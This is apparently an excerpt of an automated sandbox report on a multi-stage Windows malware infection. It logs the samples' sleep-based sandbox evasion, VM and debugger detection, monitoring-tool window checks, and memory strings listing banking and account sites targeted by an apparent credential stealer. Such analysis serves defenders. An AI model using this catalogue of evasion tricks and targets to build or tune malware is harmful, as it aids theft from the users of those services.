Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6204	Thread sleep time: -312156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3780	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1848	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 6800	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5684	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe TID: 4676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 5888	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 2636	Thread sleep count: 1962 > 30
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 2636	Thread sleep count: 1804 > 30
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 2252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 3192	Thread sleep count: 245 > 30
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 3192	Thread sleep time: -7350000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 2436	Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 3192	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe TID: 5804	Thread sleep time: -42000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe TID: 2968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 764	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe TID: 5940	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6324	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 6640	Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 6640	Thread sleep time: -252000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 5052	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 4292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 5576	Thread sleep count: 636 > 30
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe TID: 1880	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3928	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe

File opened: PhysicalDrive0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041B6EA FindFirstFileExW,	13_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001CD9FD FindFirstFileExW,	16_2_001CD9FD
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0024D9FD FindFirstFileExW,	17_2_0024D9FD

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 16_2_00197C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

16_2_00197C40

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ParallelsVirtualMachine
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: needmoney.exe, 00000016.00000000.2833755640.0000000000401000.00000020.00000001.01000000.00000017.sdmp	Binary or memory string: QEMUU
Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\]q
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000012.00000002.3336638317.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3345341880.0000019DEAC54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3339769594.0000019DE562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3339911557.0000019DE5640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost015.exe, 00000020.00000002.3006538986.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0S
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: axplong.exe, axplong.exe, 00000003.00000002.2137659091.00000000008DE000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2072201170.0000000001582000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegAsm.exe, 0000000D.00000002.2745824214.0000000001625000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: hjhTHr6fWy.exe, 0000000F.00000002.2997443428.0000000006961000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,]q
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegAsm.exe, 00000009.00000002.2954309590.00000000066E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.2100263900.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2132726768.00000000008DE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2137659091.00000000008DE000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_05400879 Start: 054008A2 End: 054008A8		0_2_05400879
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_054008CF Start: 054008A2 End: 054008A8		0_2_054008CF

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
